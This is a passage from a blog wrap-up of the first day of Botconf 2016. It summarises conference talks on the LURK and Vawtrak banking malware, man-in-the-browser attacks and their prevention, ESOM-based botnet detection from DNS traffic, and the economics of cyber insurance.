  • /0GLMF (application/3dr)
  • /1GLMF (application/octet-stream)

Those can be easily detected via a simple regular expression. Vladimir & Fyodor reviewed the different waves of attacks and how they infected victims from 2012 to 2014. A specific mention for the “ADDPERIOD” abuse which is a flag set to a domain during registration. When the owner would like to cancel the DNS, the price can be refunded. Web sites are infected via memcache cache poisoning or an extra module added to the Apache web server.How to infect websites? Note that, in 2012, No antivirus on VT was able to flag LURK samples as malicious (score: 0). The talk ended with a video recorded by the Russian police when the LURK owners were arrested.

Then Andrey Kovalev and Evgeny Sidorov presented “Browser-based Malware: Evolution and Prevention”. This is not a new type of attack. MitB (“Man in the Browser“) is an attack where hooked interaction changes the information on the rendered page like adding some Javascript code). Targets are banking sites, mail providers or social networks. In 2013, there was already a talk proposed by Thomas Siebert from GData about this topic). There are many drawbacks with this kind of attack:

  • Browser upgrades may break the hook
  • App containers make the injection more difficult
  • A web injector process has to be in the target system
  • They are evidences (IOC’s)
  • AV software are getting better to detect them.

So, can we speak about MitB-NG or MitB 2.0? They are performed via malware or adware browser extensions, WFP or remote proxies. Don’t forget VPN end-point or Tor exit-nodes that can inject code! The next part of the talk was dedicated to the Eko backdoor and SmartBrowse. So, what about dDetection and prevention? CSP (“Content Security Policy“) usually used to make XSS harder can be useful. JavaScript validation can be implemented in code. The JS checks the page integrity (like file hashes). Conclusions: there are new challenges ahead and the extension stores should implement more checks. Finally, browser developers should pay more attention to mechanisms to protect users from rogue extensions (with signatures), AV should give more focus on extension and not only droppers.

The next talk was titled “Language Agnostic Botnet Detection Based on ESOM and DNS” and is the result of the research performed by a team: Urs Enliser, Christian Dietz, Gabi Drei and Rocco Mäandrisch. The talk started with the motivations to perform such research. Most malware uses DGA or “Domain Generation Algorithm”. If this algorithm can be reversed (sometimes it is), we are able to generate the list of all domains and build useful lists of IOC’s. The approach presented here was different. Why not use ESOM (“Emergent Self-Organising Maps“) to try to detect malicious domains amongst all the DNS traffic? The analysis was based on the following steps:

  • Extract language features from domain names in data samples
  • Run ESOM training
  • Categorise domain names from real live traffic with ESOM map

Here is an example of ESOM output:

SOM Example

The magic behing ESOM was explained but, for newbies like me, it was difficult to follow. I’d like to get a deeper introduction about this topic. The research is still ongoing but it looks promising.

The afternoon coffee break was welcome before the last set of presentations.  Victor Acin and  Raashid Bhat came on stage to present “Vawtrak Banking Trojan : A Threat to the Banking Ecosystem”. Vawtrak is in the wild for a while. It is performing MitB (see above) and is very modular & decentralised. Know before as Neverquest. The malware internals were reviewed (LZMAT compression, 32 & 64 bits versions, XOR encoding, etc) as well as the configuration containing C&C servers, botnet configuration, version, sign keys). By default, it injects itself into explorer.exe and iexplore.exe then in the child processes. After a review of the infection processes and all techniques used, the speakers reviewed the communications with the C&C. Vawtrak is a modular trojan. Multiple plugins provide opcode / API interface. Some statistics were disclosed and look very impressive:

  • Used by 2 groups
  • 85k botnet infections
  • Top-5: US, Canada, UK, India, France
  • 2.5M credentials exfiltrated
  • 82% of infection are in USA
  • 4000 identified IOC’s
  • Win7 is the most affected OS
  • 2058 infections on windows server 2008

Then, Wayne Crowder presented “Snoring Is Optional: The Metrics and Economics of Cyber Insurance for Malware Related Claims”. Not a technical talk at all but very interesting! Wayne’s exercise was to try to talk about botnets not from a technical point of view but from a cyber-insurance point of view. An interesting statistics reported by Wayne:If

If cybercrime had been a US company in 2014 it would have been the 2nd largest…

From an insurance perspective, more  malware samples mean more risks of data leak and more costs for the company. Insurance drives safety & security in many domains and it will follow this trend in cyber security for sure. What’s covered? Data theft (PII, cards, health data,), malwares, DDOS, hacking, business interruption, phishing, extortions, mistakes. What must cover a good policy?

  • Legal damages
  • Crisis
  • PCI (or similar) fines
  • Availability
  • Extortion
  • “cyber related perils” (who said “IoT”?)

Cyber Risks

The talk was clearly based on the US market and Wayne gave a lot of statistics. But, keep in mind that this could change in the EU zone with the new notification law coming in 2018 (GDPR) . Wayne also reviewed several cases where cyber insurance was involved (with nice names like Sony, Target, hospital ransomware, …). Not that not everything is covered (brand, reputation, state sponsored hacking). Very interesting and I’m curious to see how the cyber-insurance market will evolve in the (near) future.

The last talk was “Hunting Droids from the Inside” by Lukas Siewierski, also from Google. This was given again under TLP:RED.

That’s all for the first day and stay tuned for a new wrap-up. Don’t forget that some talks are streaming live via Youtube.

[The post Botconf 2016 Wrap-Up Day #1 has been first published on /dev/random]

from Xavier